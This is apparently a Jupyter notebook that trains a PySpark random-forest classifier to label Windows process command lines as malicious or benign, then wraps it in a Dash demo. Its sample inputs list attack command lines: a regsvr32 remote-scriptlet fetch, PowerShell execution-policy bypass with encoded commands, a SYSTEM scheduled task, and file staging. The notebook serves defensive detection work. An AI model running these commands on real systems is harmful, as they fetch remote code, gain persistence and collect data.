In [2]:
from pyspark.conf import SparkConf
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
import pyspark.sql.types as T
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pyspark.ml import feature, evaluation, Pipeline
from pyspark.ml.classification import RandomForestClassifier
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pyspark.ml.tuning import CrossValidator, ParamGridBuilder
from functools import reduce
from pyspark.sql import DataFrame
from pyspark.sql import Row

In [3]:
conf = (SparkConf()
            .setAppName('random_forest')
            .setMaster('spark://spark-master:7077')
       )
conf.set("spark.executor.memory", "6g")
conf.set("spark.driver.maxResultSize", "0")
conf.set("spark.sql.shuffle.partitions", "6")
conf.set("spark.default.parallelism", "6")
conf.set("spark.driver.memory", "3g") 

<pyspark.conf.SparkConf at 0x7f45b71bf5c0>

In [4]:
spark = SparkSession.builder.config(conf=conf).getOrCreate()

In [5]:
# load original dataset without bootstrapped samples
df = (spark.read.format('csv')
      .option('inferSchema', 'true')
      .option('header', 'true')
      .option('escape', '"')
      .load('hdfs://namenode:9000/data/no_bootstrap.csv') 
     )

In [6]:
df.count()

52395

### Create command line tokens

In [7]:
import re
@F.udf(returnType=T.StringType())
def clean_input2(s):
    common_strings = ['windows', 'system32', 'cmd.exe', 'sandcat.exe', 'c', 'windowspowershell', 'v1.0', 'powershell.exe', '']

    pattern = re.compile(r"""
        [:|"?']
        | --field-trial-handle=.*\d+
        | //.*com(/.*)/
        | \s*"\s*
        | \{.*\}
        | [=;(),]
        | \\
        | //
        | \s+\.\s+ 
        | $.
        | $_.
        | (>>)
    """, re.VERBOSE)
    
    return ','.join([x.lower() for x in re.sub(pattern, ' ', s).split() if x.lower() not in common_strings and len(x) >= 2])

In [8]:
from pyspark.sql.functions import regexp_extract, regexp_replace, col, count, split, size, to_date

def clean_input1(df):
    _df = df.select(
        '*'
    ).withColumn(
        'class_label', (col('class_label').cast('int'))
    ).withColumn(
        'cmd_line_tokens', split(clean_input2(col('command_line')), ',')
    )
    
    return _df

In [9]:
df = clean_input1(df)

In [10]:
df = df.filter(F.size('cmd_line_tokens') > 2)

# Data engineering pipelines 
+ Term Frequency (one-hot): value indicates if feature is present in observation
+ Feature has to be present at least once in dataset and in at least 50 documents

In [11]:
cv_transformer = feature.CountVectorizer(minTF=1, minDF=5, binary=True, inputCol='cmd_line_tokens', outputCol='tf')

In [12]:
estimator = Pipeline(stages=[cv_transformer]).fit(df)

In [13]:
estimator.transform(df).select('cmd_line_tokens','tf').sample(.2).show(20, False)

+-----------------------------------------------------------------------------+------------------------------------------------------+
|cmd_line_tokens                                                              |tf                                                    |
+-----------------------------------------------------------------------------+------------------------------------------------------+
|[svchost.exe, -k, localservicenetworkrestricted, -p, -s, lmhosts]            |(1519,[25,26,57,60,103,459],[1.0,1.0,1.0,1.0,1.0,1.0])|
|[svchost.exe, -k, localservicenetworkrestricted, -p, -s, dhcp]               |(1519,[25,26,57,60,103,567],[1.0,1.0,1.0,1.0,1.0,1.0])|
|[svchost.exe, -k, localservicenetworkrestricted, -p]                         |(1519,[25,26,57,103],[1.0,1.0,1.0,1.0])               |
|[svchost.exe, -k, networkservice, -p, -s, dnscache]                          |(1519,[25,26,57,60,151,596],[1.0,1.0,1.0,1.0,1.0,1.0])|
|[svchost.exe, -k, netsvcs, -p, -s, usermanager]       

In [14]:
len(estimator.stages[0].vocabulary)

1519

In [15]:
training_df, validation_df, testing_df = df.randomSplit([0.6, 0.3, 0.1], seed=0)

In [16]:
rf = RandomForestClassifier(featuresCol='tf', labelCol='class_label', maxDepth=6, numTrees=100, 
                            featureSubsetStrategy='sqrt', impurity='gini', seed=0)
rf_estimator = Pipeline(stages=[cv_transformer, rf])
rf_model = rf_estimator.fit(training_df)

In [17]:
rf_model.transform(testing_df).\
    select(F.avg(F.expr('float(class_label = prediction)')).alias('accuracy')).\
    first()

Row(accuracy=0.9789359391965256)

In [18]:
print(rf_model.stages[-1].trees[3].toDebugString)

DecisionTreeClassificationModel (uid=dtc_44a9b1babff9) of depth 6 with 13 nodes
  If (feature 198 <= 0.5)
   If (feature 332 <= 0.5)
    If (feature 192 <= 0.5)
     If (feature 334 <= 0.5)
      If (feature 3 <= 0.5)
       If (feature 884 <= 0.5)
        Predict: 0.0
       Else (feature 884 > 0.5)
        Predict: 1.0
      Else (feature 3 > 0.5)
       Predict: 0.0
     Else (feature 334 > 0.5)
      Predict: 1.0
    Else (feature 192 > 0.5)
     Predict: 1.0
   Else (feature 332 > 0.5)
    Predict: 1.0
  Else (feature 198 > 0.5)
   Predict: 1.0



# Inference

+ The tokens with the most importance all indicate a malicious log and are very similar to the tokens identified in the LR model

In [19]:
vocab = rf_model.stages[0].vocabulary
feature_importance = rf_model.stages[-1].featureImportances.toArray()
vocab_importance_df = pd.DataFrame({'vocab': vocab, 'weight': feature_importance})
vocab_importance_df.sort_values('weight', ascending=False).head(20)

Unnamed: 0,vocab,weight
102,-executionpolicy,0.107252
100,bypass,0.085936
97,-c,0.057613
158,/c,0.050603
171,select-object,0.039596
193,reg,0.036716
198,hklm,0.026495
206,-first,0.022687
192,select,0.021821
227,currentversion,0.021065


# Model Tuning

In [20]:
paramGrid = (ParamGridBuilder() 
                 .addGrid(rf_model.stages[0].minDF, [3,5,10]) 
                 .addGrid(rf_model.stages[1].numTrees, [300,400,500,600,700
                                                       
                                                       ]) 
                 .addGrid(rf_model.stages[1].maxDepth, [10,15,20])
                 .build()
            )

In [21]:
models = []
for grid in range(len(paramGrid)):
    print("Fitting model {}".format(grid))
    _model = rf_estimator.fit(validation_df, paramGrid[grid])
    models.append(_model)

Fitting model 0
Fitting model 1
Fitting model 2
Fitting model 3
Fitting model 4
Fitting model 5
Fitting model 6
Fitting model 7
Fitting model 8
Fitting model 9
Fitting model 10
Fitting model 11
Fitting model 12
Fitting model 13
Fitting model 14
Fitting model 15
Fitting model 16
Fitting model 17
Fitting model 18
Fitting model 19
Fitting model 20
Fitting model 21
Fitting model 22
Fitting model 23
Fitting model 24
Fitting model 25
Fitting model 26
Fitting model 27
Fitting model 28
Fitting model 29
Fitting model 30
Fitting model 31
Fitting model 32
Fitting model 33
Fitting model 34
Fitting model 35
Fitting model 36
Fitting model 37
Fitting model 38
Fitting model 39
Fitting model 40
Fitting model 41
Fitting model 42
Fitting model 43
Fitting model 44


In [22]:
evaluator = BinaryClassificationEvaluator(labelCol='class_label', metricName='areaUnderROC')
auc_scores = [evaluator.evaluate(model.transform(validation_df)) for model in models]

In [23]:
auc_scores

[0.9972198490538934,
 0.9981039592638306,
 0.9986022458572986,
 0.9974207939319136,
 0.9982271723783368,
 0.998342116156299,
 0.9976248102777932,
 0.9984694639390772,
 0.9985953941213049,
 0.998326758817003,
 0.9983564102951823,
 0.9984852938118901,
 0.997834497025874,
 0.9981360915429731,
 0.9986068530590875,
 0.996158302508397,
 0.9962404052069413,
 0.9969754310923273,
 0.9950993548972428,
 0.9967163645917404,
 0.9966433581633946,
 0.996238987606391,
 0.9966192589540376,
 0.9968280006350849,
 0.9962028387923556,
 0.9970952183388367,
 0.9972857674794873,
 0.9957744871593741,
 0.9968062640933122,
 0.9971153010133008,
 0.9911085730810886,
 0.9947788590394716,
 0.9959910256434489,
 0.9923972901147878,
 0.9958011853030735,
 0.9956287105694408,
 0.9927487369179097,
 0.9945755514938674,
 0.9957939791669423,
 0.9925721275160047,
 0.9948263486579103,
 0.9953731880702298,
 0.9923717733048805,
 0.9956113449626982,
 0.9956451311091497]

In [24]:
best_model_idx = np.argmax(auc_scores)
best_model = models[best_model_idx]
print("Best params: \n\n{}\n".format(paramGrid[best_model_idx]))
print("Best Validation AUC: \n\n{}".format(auc_scores[best_model_idx]))

Best params: 

{Param(parent='CountVectorizer_a19d2d2525be', name='minDF', doc='Specifies the minimum number of different documents a term must appear in to be included in the vocabulary. If this is an integer >= 1, this specifies the number of documents the term must appear in; if this is a double in [0,1), then this specifies the fraction of documents. Default 1.0'): 3.0, Param(parent='RandomForestClassifier_40d9ba405786', name='numTrees', doc='Number of trees to train (>= 1)'): 700, Param(parent='RandomForestClassifier_40d9ba405786', name='maxDepth', doc='Maximum depth of the tree. (>= 0) E.g., depth 0 means 1 leaf node; depth 1 means 1 internal node + 2 leaf nodes.'): 20}

Best Validation AUC: 

0.9986068530590875


## Best model
+ minDF: 10
+ numTrees: 700
+ maxDepth: 20

In [25]:
vocab = best_model.stages[0].vocabulary
feature_importance = best_model.stages[-1].featureImportances.toArray()
best_vocab_importance_df = pd.DataFrame({'token': vocab, 'importance': feature_importance})
best_vocab_importance_df.sort_values('importance', ascending=False).head(20)

Unnamed: 0,token,importance
107,bypass,0.079016
108,-executionpolicy,0.074952
103,-c,0.060897
192,reg,0.034378
238,net,0.033503
198,hklm,0.028682
195,foreach,0.022863
224,currentversion,0.019843
185,-path,0.017188
344,delete,0.016475


In [39]:
print(best_model.stages[-1].trees[2].toDebugString)

DecisionTreeClassificationModel (uid=dtc_5d6fc8fe6361) of depth 20 with 49 nodes
  If (feature 1 <= 0.5)
   If (feature 265 <= 0.5)
    If (feature 103 <= 0.5)
     If (feature 677 <= 0.5)
      If (feature 238 <= 0.5)
       If (feature 336 <= 0.5)
        If (feature 783 <= 0.5)
         If (feature 251 <= 0.5)
          If (feature 733 <= 0.5)
           If (feature 531 <= 0.5)
            If (feature 350 <= 0.5)
             If (feature 535 <= 0.5)
              If (feature 720 <= 0.5)
               If (feature 996 <= 0.5)
                If (feature 9 <= 0.5)
                 If (feature 222 <= 0.5)
                  If (feature 1070 <= 0.5)
                   If (feature 705 <= 0.5)
                    If (feature 343 <= 0.5)
                     If (feature 788 <= 0.5)
                      Predict: 0.0
                     Else (feature 788 > 0.5)
                      Predict: 1.0
                    Else (feature 343 > 0.5)
                     Predict: 1.0
                 

# Cross Validation
+ test best_model performance on training dataset

In [27]:
evaluator.evaluate(best_model.transform(testing_df))

0.9985629287817379

In [37]:
best_model_df = best_model.transform(testing_df)
tp = best_model_df.filter((best_model_df.class_label == 1) & (best_model_df.prediction == 1)).count()
tn = best_model_df.filter((best_model_df.class_label == 0) & (best_model_df.prediction == 0)).count()
fp = best_model_df.filter((best_model_df.class_label == 0) & (best_model_df.prediction == 1)).count()
fn = best_model_df.filter((best_model_df.class_label == 1) & (best_model_df.prediction == 0)).count()
recall = tp / (tp + fn)

In [38]:
recall

0.6612903225806451

In [36]:
pd.DataFrame(data=[[tn,fp],[fn,tp]], index=['actual_0', 'actual_1'], columns=['predicted_0', 'predicted_1'])

Unnamed: 0,predicted_0,predicted_1
actual_0,4481,0
actual_1,42,82


In [31]:
best_model.save('rf_model')

# Plotly Dash Code

In [32]:
common_strings = ['windows', 'system32', 'cmd.exe', 'sandcat.exe', 'c', 'windowspowershell', 'v1.0', 'powershell.exe', '']

import re
def demo_clean_input(s):
    pattern = re.compile(r"""
        [:|"?']
        | --field-trial-handle=.*\d+
        | //.*com(/.*)/
        | \s*"\s*
        | \{.*\}
        | [=;(),]
        | \\
        | //
        | \s+\.\s+ 
        | $.
        | $_.
        | (>>)
    """, re.VERBOSE)
    
    return ','.join([x.lower() for x in re.sub(pattern, ' ', s).split() if x.lower() not in common_strings and len(x) >= 2])

In [33]:
def get_coefs(tokens):
    """ get the coefficient for tokens passed from GUI and returns as string """
    
    _format = "{}: *{:.5f}*\n"
    s = ""

    token_coefs = []
    for token in tokens.split(','):
        try:
            weight = best_vocab_importance_df.loc[best_vocab_importance_df.loc[:, 'token'] == token, 'importance'].values[0]
            s += _format.format(token, weight)
        except:
            weight = 0.0  # token is not in vocabulary, therefore return 0 for weight
            s += _format.format(token, weight)   
    return s

# get_coefs('cmd.exe,/c,/t')

In [34]:
def spark_code(s):
    """ tokenizes the input and calls the existing feature and prediction pipelines to transform the input """
    
    # create tokens
    tokens = demo_clean_input(s)
    print(tokens)
    
    # create dataframe
    _schema = T.StructType([
        T.StructField('cmd_line_tokens', T.StringType(), True),
    ])         
    myrow = Row(cmd_line_tokens=tokens)
    text_df = spark.createDataFrame([myrow], schema=_schema).withColumn('cmd_line_tokens', F.split(F.col('cmd_line_tokens'), r','))
    
    #transform features using existing pipelines
    features = best_model.transform(text_df)
    
    _features = features.select('cmd_line_tokens').rdd.take(1)[0]['cmd_line_tokens']
    prediction = features.select('prediction').rdd.take(1)[0]['prediction']
    probability = features.select('probability').rdd.take(1)[0]['probability']
    
    coefs = get_coefs(tokens)
    
    result = """
    Tokens: {} \n 
    Probability: {} \n 
    Prediction: {} \n 
    {}
    """
    
    if prediction == 0:
        return result.format(_features, probability, prediction, "*** Benign ***"), coefs
    else:
        return result.format(_features, probability, prediction, "*** Malicious ***"), coefs
                         
# spark_code(r'C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS')
# spark_code(r'"powershell.exe -ExecutionPolicy Bypass -C ""Compress-Archive -Path C:\Users\win10-user3\staged-DestinationPath C:\Users\win10-user3\staged.zip -Force;ls C:\Users\win10-user3\staged.zip | foreach {$_.FullName} | select')

In [35]:
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
from jupyterlab_dash import AppViewer
from dash.dependencies import Input, Output

external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']

viewer = AppViewer()

app = dash.Dash(name=__name__, external_stylesheets=external_stylesheets)

markdown_text = '''
### Windows process command-line classifier (Random Forest)
Please copy and paste your log in the box below
'''

sample_input_data = r'''
### Example malicious logs 
+ C:\Windows\system32\regsvr32.exe" /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
+ powershell.exe -ExecutionPolicy Bypass -C "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object"
+ cmd.exe /C "net share"
powershell.exe -ExecutionPolicy Bypass -C "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\Emulate-Administrator-Tasks.ps1\""
### Example benign logs 
+ C:\Windows\system32\dllhost.exe /Processid:{B2FEB3AD-8AE6-42E7-B2E4-60609573B404}
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS 
+ C:\Windows\System32\Upfc.exe /launchtype boot /cv 09o3CnnAskG8AMTNUwkQhQ.0
### Example logs not in dataset
+ cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr "powershell.exe -nop -exec bypass -EncodedCommand $pcode" /sc ONLOGON /RU SYSTEM'
+ cmd.exe /c dir /s /b \\\\FILE001\\secrets
+ C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -nop -exec bypass -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA
+ cmd.exe /c reg query "\\\\\\\\FILE001\\secrets\\hklm\\system\\currentcontrolset\\control\\terminal server
'''

app.layout = html.Div([
    html.Div([
        html.Div([
            dcc.Markdown(children=markdown_text),
            dcc.Textarea(id='input', value='C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc', style={'height': '50px', 'width': '50%'}),
            
        html.Div([html.Button(children='Submit', id='button', n_clicks=0)], style={'margin': '2px'}),
            
        html.Div([
            dcc.Textarea(id='output', value='', style={'height': '175px', 'width': '50%'}),
            dcc.Textarea(id='coefs', value='', style={'height': '175px', 'width': '25%'})
        ]),
            dcc.Markdown(children=sample_input_data)
        ])
    ])
])
    
@app.callback(
    [Output(component_id='output', component_property='value'),  # set output component on reactive change
    Output(component_id='coefs', component_property='value')],
    [Input(component_id='button', component_property='n_clicks')],  #  reactive input comes from button press
    [dash.dependencies.State('input', 'value')]
)
def on_click(n_clicks, value):
    # call pyspark logic from here
    return spark_code(value)
    

viewer.show(app)